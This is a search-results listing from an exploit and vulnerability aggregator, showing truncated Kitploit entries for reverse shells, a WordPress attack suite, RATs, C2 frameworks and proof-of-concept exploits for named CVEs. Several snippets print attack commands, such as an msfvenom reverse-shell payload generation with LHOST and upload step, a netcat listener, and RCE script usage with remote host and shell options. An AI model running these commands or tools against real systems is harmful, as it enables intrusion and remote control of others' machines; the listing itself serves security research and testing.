Lucene search
+L

35104 matches found

Kitploit
Kitploit
added 2026/09/23 10:36 a.m.19 views

PSAsyncShell

PSAsyncShell PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell. Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections. Additionally...

6.1AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/23 10:34 a.m.17 views

WPForce

WPForce - Wordpress Attack Suite ABOUT: WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/23 10:33 a.m.9 views

CVE-2025-32463

Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot Executing the PoC on Ubuntu 24.04.2 LTS server with Sudo v1.9.15p5, using an unprivileged user with no Sudo rules defined, results in a root shell outside of the chrooted environment. lowpriv@prod:/CVE-2025-3246...

9.3CVSS7.5AI score0.61039EPSS
SaveExploits71
Kitploit
Kitploit
added 2026/09/23 10:32 a.m.10 views

CVE-2009-2265

Version: ColdFusion 8.0.1 CVE-2009-2265 msfvenom -p java/jspshellreversetcp LHOST=10.10.14.12 LPORT=4444 -f raw shell.jsp python upload.py 10.10.10.11 8500 shell.jsp Example :...

7.5CVSS6.8AI score0.83744EPSS
SaveExploits11
Kitploit
Kitploit
added 2026/09/23 10:30 a.m.7 views

CVE-2014-6271

CVE-2014-6271 Shellshock Python Exploit A clean, efficient, and interactive Python implementation designed to test for the Shellshock vulnerability CVE-2014-6271 via HTTP environment variable injection. 📝 Description Shellshock CVE-2014-6271 is a critical security vulnerability in the Bash shell...

10CVSS8.8AI score0.99999EPSS
SaveExploits146
Kitploit
Kitploit
added 2026/09/23 10:24 a.m.8 views

CVE-2020-0796

...

10CVSS8AI score0.9981EPSS
SaveExploits126
Kitploit
Kitploit
added 2026/09/23 10:24 a.m.12 views

CVE-2022-0847-Exploit-Implementation

CVE-2022-0847-Exploit-Implementation This is a POC showing how to pop a reverse bash shell for arbitrary code execution on a foreign machine using CVE-2022-0847, "Dirty Pipe Exploit". This vulnerability only affects Linux kernel versions 5.8 or newer but was patched in versions 5.16.11, 5.15.25,...

7.8CVSS7.9AI score0.89721EPSS
SaveExploits102
Kitploit
Kitploit
added 2026/09/23 10:21 a.m.10 views

CVE-2025-32433-exploit

CVE-2025-32433-exploit rlwrap -cAr nc -lnvp 4444 python3 exploit.py...

10CVSS5.3AI score0.98754EPSS
SaveExploits38
Kitploit
Kitploit
added 2026/09/23 10:16 a.m.8 views

CVE-2019-18935-memShell

CVE-2019-18935-memShell source CVE-2019-18935-Memshell Compile root@kitploit: 1.Build https://github.com/A-D-Team/SharpMemshell/blob/main/VirtualPath/memshell.cs 2.Convert dll to byte array 3.Replace rawData in memShell.cpp 4.csc /target:module empty.cs 5.cl /c memShell.cpp 6.link /DLL /LTCG...

9.8CVSS8.2AI score0.99737EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/23 10:06 a.m.14 views

DNS-Shell

DNS-shell DNS-Shell is an interactive Shell over DNS channel. The server is Python based and can run on any operating system that has python installed, the payload is an encoded PowerShell command. Understanding DNS-Shell The Payload is generated when the sever script is invoked and it simply...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/23 10:00 a.m.11 views

egressbuster

EgressBuster Copyright 2015 TrustedSec - EgressBuster Written by: David Kennedy ReL1K Company: TrustedSec DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period. Please read the LICENSE for the licensing ...

5.7AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/23 10:00 a.m.9 views

SenselessViolence

SenselessViolence CVE-2022-31814 pfSense pfBlockerNG = 2.1.426 Exploitation Toolkit. What? This is an exploitation toolkit for the pfSense pfBlockerNG = 2.1.426 plugins remote command injection feature discovered by IHTeam. I wrote this to play around with some of the design principles found in t...

9.8CVSS8.2AI score0.91881EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/23 10:00 a.m.10 views

routeros-CVE-2018-14847-bytheway

By the Way By the Way is an exploit that enables a root shell on Mikrotik devices running RouterOS versions: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42.0 Beta: 6.29rc1 - 6.43rc3 The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an...

9.1CVSS8.4AI score0.96087EPSS
SaveExploits24
Kitploit
Kitploit
added 2026/09/23 9:55 a.m.20 views

One-Lin3r

One-Lin3r One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing Windows, Linux, macOS or even BSD systems or hacking generally with a lot of new features to make all of this fully automated ex: you won't even need to copy...

6.4AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/23 9:50 a.m.10 views

CVE-2020-1938

cve-2020-1938 1.read file: python3 tomcat.py URL -f /WEB-INF/web.xml example: python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090 2.excute shell add --rec 1 refere: https://www.t00ls.net/articles-55062.html...

9.8CVSS7.9AI score0.9927EPSS
SaveExploits51
Kitploit
Kitploit
added 2026/09/23 9:48 a.m.15 views

Eden-RAT

Eden-RAT Background While developing EgoDrop and DuplexSpy, I successfully implemented an interactive shell within a C-based GUI application. I then recalled one of my earlier projects that had been suspended due to my limited development experience at the time. Therefore, I decided to revisit an...

6.2AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/23 9:45 a.m.6 views

CVE-2020-15227

CVE-2020-15227 DISCLAIMER! I take no responsibility of using it in wild life environment so please do NOT do it. This thingy is just to demonstrate and for test things for sysadmins I made this exploit according to publishing a CVE of David Grudl The founder of Nette foundation as he did not solv...

9.8CVSS8.2AI score0.34424EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/23 9:42 a.m.8 views

CVE-2019-7609

CVE-2019-7609 exploit CVE-2019-7609kibana RCE on right way by python2 scripts snapshot usage root@kitploit: python2 CVE-2019-7609-kibana-rce.py -h usage: CVE-2019-7609-kibana-rce.py -h -u URL -host REMOTEHOST -port REMOTEPORT --shell optional arguments: -h, --help show this help message and exit ...

10CVSS7.9AI score0.95338EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/23 9:25 a.m.12 views

BerrySentinel

🫐 Berry Sentinel Real-time behavioral C2 Command & Control connection detector Zero-signature · Bulletproof Collection · Deep Scan · Kill Engine What is it? Berry Sentinel monitors all active network connections on your system and analyzes the behavior of the processes that generate them to detec...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/23 9:19 a.m.51 views

zuthaka

A collaborative free open-source Command & Control integration framework that allows developers to concentrate on the core function and goal of their C2. Explore the docs » · Report Bug · Request Feature · Table of Contents 1. About The Project Problem statement Solution Built With 2. Already...

5.6AI score
SaveExploits0References1
Rows per page
Query Builder